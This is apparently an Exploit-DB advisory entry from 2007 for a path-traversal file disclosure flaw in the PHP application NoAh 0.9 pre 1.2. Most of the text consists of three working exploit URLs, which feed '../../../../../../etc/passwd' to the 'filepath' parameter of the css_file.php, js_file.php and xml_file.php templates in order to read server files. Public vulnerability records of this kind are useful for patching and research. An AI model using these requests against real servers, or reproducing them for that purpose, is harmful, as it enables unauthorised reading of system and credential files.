NoAh 0.9 pre 1.2 - 'filepath' Remote File Disclosure

EDB-ID:

4675

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-11-28

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script : http://sourceforge.net/project/showfiles.php?group_id=131995  /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd
S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali]

# milw0rm.com [2007-11-28]